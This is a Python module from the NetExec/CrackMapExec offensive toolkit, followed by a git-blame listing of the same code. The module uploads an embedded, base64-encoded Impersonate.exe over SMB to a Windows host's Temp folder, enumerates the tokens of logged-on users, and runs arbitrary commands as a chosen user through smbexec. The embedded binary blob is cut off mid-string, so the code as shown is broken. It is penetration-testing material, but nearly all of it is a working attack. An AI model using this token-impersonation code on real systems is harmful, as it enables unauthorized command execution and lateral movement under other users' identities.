NetExec/cme/modules/impersonate.py

from base64 import b64decode
from sys import exit
from os import path

class CMEModule:

    name = "impersonate"
    description = "List and impersonate tokens to run command as locally logged on users"
    supported_protocols = ["smb"]
    opsec_safe = True # could be flagged
    multiple_hosts = True

    def options(self, context, module_options):
        '''
            TOKEN     // Token id to usurp
            EXEC      // Command to exec
            IMP_EXE   // Path to the Impersonate binary on your local computer
        '''

        self.tmp_dir = "C:\\Windows\\Temp\\"
        self.share = "C$"
        self.tmp_share = self.tmp_dir.split(":")[1]
        self.impersonate = "Impersonate.exe"
        self.useembeded = True
        self.token = self.cmd = ""
        self.impersonate_embedded = b64decode("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

        if "EXEC" in module_options:
            self.cmd = module_options["EXEC"]

        if "TOKEN" in module_options:
            self.token = module_options["TOKEN"]

        if "IMP_EXE" in module_options:
            self.imp_exe = module_options["IMP_EXE"]
            self.useembeded = False

    def list_available_primary_tokens(self, _, connection):
        command = f"{self.tmp_dir}Impersonate.exe list"
        return connection.execute(command, True)
        
    def on_admin_login(self, context, connection):

        if self.useembeded:
            file_to_upload = "/tmp/Impersonate.exe"
            with open(file_to_upload, 'wb') as impersonate:
                impersonate.write(self.impersonate_embedded)
        else:
            if path.isfile(self.imp_exe):
                file_to_upload = self.imp_exe
            else:
                context.log.error(f"Cannot open {self.imp_exe}")
                exit(1)

        context.log.info(f"Uploading {self.impersonate}")
        with open(file_to_upload, 'rb') as impersonate:
            try:
                connection.conn.putFile(self.share, f"{self.tmp_share}{self.impersonate}", impersonate.read)
                context.log.success(f"Impersonate binary successfully uploaded")
            except Exception as e:
                context.log.error(f"Error writing file to share {self.tmp_share}: {e}")
                return

        try:
            if self.cmd == "" or self.token == "":
                context.log.info(f"Listing available primary tokens")
                p = self.list_available_primary_tokens(context, connection)
                for line in p.splitlines():
                    token, token_owner = line.split(" ", 1)
                    context.log.highlight(f"Primary token ID: {token} {token_owner}")
            else:
                impersonated_user = ""
                p = self.list_available_primary_tokens(context, connection)
                for line in p.splitlines():
                    token_id, token_owner = line.split(" ", 1)
                    if token_id == self.token:
                        impersonated_user = token_owner.strip()
                        break

                if impersonated_user:  
                    context.log.info(f"Executing {self.cmd} as {impersonated_user}")
                    command = f"{self.tmp_dir}Impersonate.exe exec {self.token} \"{self.cmd}\""
                    for line in connection.execute(command, True, methods=["smbexec"]).splitlines():
                        context.log.highlight(line)
                else:
                    context.log.error(f"Invalid token ID submitted")

        except Exception as e:
            context.log.error(f"Error runing command: {e}")
        finally:
            try:
                connection.conn.deleteFile(self.share, f"{self.tmp_share}{self.impersonate}")
                context.log.success(f"Impersonate binary successfully deleted")
            except Exception as e:
                context.log.error(f"Error deleting Impersonate.exe on {self.share}: {e}")
Final update! 2022-10-27 10:21:46 +00:00			`from base64 import b64decode`
Refactor options 2022-10-27 19:32:55 +00:00			`from sys import exit`
Addind the IMP_EXE option Guess this will be the final one :P 2022-10-29 09:52:48 +00:00			`from os import path`
Add files via upload 2022-07-04 12:44:35 +00:00
			`class CMEModule:`

			`name = "impersonate"`
			`description = "List and impersonate tokens to run command as locally logged on users"`
			`supported_protocols = ["smb"]`
			`opsec_safe = True # could be flagged`
			`multiple_hosts = True`

			`def options(self, context, module_options):`
			`'''`
Final update! 2022-10-27 10:21:46 +00:00			`TOKEN // Token id to usurp`
Addind the IMP_EXE option Guess this will be the final one :P 2022-10-29 09:52:48 +00:00			`EXEC // Command to exec`
			`IMP_EXE // Path to the Impersonate binary on your local computer`
Add files via upload 2022-07-04 12:44:35 +00:00			`'''`

			`self.tmp_dir = "C:\\Windows\\Temp\\"`
			`self.share = "C$"`
			`self.tmp_share = self.tmp_dir.split(":")[1]`
			`self.impersonate = "Impersonate.exe"`
Addind the IMP_EXE option Guess this will be the final one :P 2022-10-29 09:52:48 +00:00			`self.useembeded = True`
Refactor options 2022-10-27 19:32:55 +00:00			`self.token = self.cmd = ""`
Update impersonate.py Adding double quotes for spaced cmd 2022-10-27 16:57:00 +00:00			self.impersonate_embedded = b64decode("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
Add files via upload 2022-07-04 12:44:35 +00:00
Addind the IMP_EXE option Guess this will be the final one :P 2022-10-29 09:52:48 +00:00			`if "EXEC" in module_options:`
			`self.cmd = module_options["EXEC"]`
Refactor options 2022-10-27 19:32:55 +00:00
Addind the IMP_EXE option Guess this will be the final one :P 2022-10-29 09:52:48 +00:00			`if "TOKEN" in module_options:`
			`self.token = module_options["TOKEN"]`

			`if "IMP_EXE" in module_options:`
			`self.imp_exe = module_options["IMP_EXE"]`
			`self.useembeded = False`
Add files via upload 2022-07-04 12:44:35 +00:00
Update impersonate.py 2022-07-09 16:34:35 +00:00			`def list_available_primary_tokens(self, _, connection):`
Final update! 2022-10-27 10:21:46 +00:00			`command = f"{self.tmp_dir}Impersonate.exe list"`
Update impersonate.py 2022-07-09 16:34:35 +00:00			`return connection.execute(command, True)`

Add files via upload 2022-07-04 12:44:35 +00:00			`def on_admin_login(self, context, connection):`

Addind the IMP_EXE option Guess this will be the final one :P 2022-10-29 09:52:48 +00:00			`if self.useembeded:`
			`file_to_upload = "/tmp/Impersonate.exe"`
			`with open(file_to_upload, 'wb') as impersonate:`
			`impersonate.write(self.impersonate_embedded)`
			`else:`
			`if path.isfile(self.imp_exe):`
			`file_to_upload = self.imp_exe`
			`else:`
			`context.log.error(f"Cannot open {self.imp_exe}")`
			`exit(1)`
Add files via upload 2022-07-04 12:44:35 +00:00
			`context.log.info(f"Uploading {self.impersonate}")`
Addind the IMP_EXE option Guess this will be the final one :P 2022-10-29 09:52:48 +00:00			`with open(file_to_upload, 'rb') as impersonate:`
Add files via upload 2022-07-04 12:44:35 +00:00			`try:`
			`connection.conn.putFile(self.share, f"{self.tmp_share}{self.impersonate}", impersonate.read)`
Update impersonate.py 2022-07-09 16:34:35 +00:00			`context.log.success(f"Impersonate binary successfully uploaded")`
Add files via upload 2022-07-04 12:44:35 +00:00			`except Exception as e:`
			`context.log.error(f"Error writing file to share {self.tmp_share}: {e}")`
			`return`

			`try:`
Refactor options 2022-10-27 19:32:55 +00:00			`if self.cmd == "" or self.token == "":`
Update impersonate.py 2022-07-09 16:34:35 +00:00			`context.log.info(f"Listing available primary tokens")`
			`p = self.list_available_primary_tokens(context, connection)`
Add files via upload 2022-07-04 12:44:35 +00:00			`for line in p.splitlines():`
Final update! 2022-10-27 10:21:46 +00:00			`token, token_owner = line.split(" ", 1)`
			`context.log.highlight(f"Primary token ID: {token} {token_owner}")`
Add files via upload 2022-07-04 12:44:35 +00:00			`else:`
Update impersonate.py 2022-07-09 16:34:35 +00:00			`impersonated_user = ""`
			`p = self.list_available_primary_tokens(context, connection)`
			`for line in p.splitlines():`
			`token_id, token_owner = line.split(" ", 1)`
Final update! 2022-10-27 10:21:46 +00:00			`if token_id == self.token:`
			`impersonated_user = token_owner.strip()`
Update impersonate.py 2022-07-09 16:34:35 +00:00			`break`
Final update! 2022-10-27 10:21:46 +00:00
			`if impersonated_user:`
Refactor options 2022-10-27 19:32:55 +00:00			`context.log.info(f"Executing {self.cmd} as {impersonated_user}")`
			`command = f"{self.tmp_dir}Impersonate.exe exec {self.token} \"{self.cmd}\""`
Addind the IMP_EXE option Guess this will be the final one :P 2022-10-29 09:52:48 +00:00			`for line in connection.execute(command, True, methods=["smbexec"]).splitlines():`
Final update! 2022-10-27 10:21:46 +00:00			`context.log.highlight(line)`
Update impersonate.py 2022-07-09 16:34:35 +00:00			`else:`
			`context.log.error(f"Invalid token ID submitted")`

Add files via upload 2022-07-04 12:44:35 +00:00			`except Exception as e:`
			`context.log.error(f"Error runing command: {e}")`
			`finally:`
			`try:`
			`connection.conn.deleteFile(self.share, f"{self.tmp_share}{self.impersonate}")`
Final update! 2022-10-27 10:21:46 +00:00			`context.log.success(f"Impersonate binary successfully deleted")`
Add files via upload 2022-07-04 12:44:35 +00:00			`except Exception as e:`
Final update! 2022-10-27 10:21:46 +00:00			`context.log.error(f"Error deleting Impersonate.exe on {self.share}: {e}")`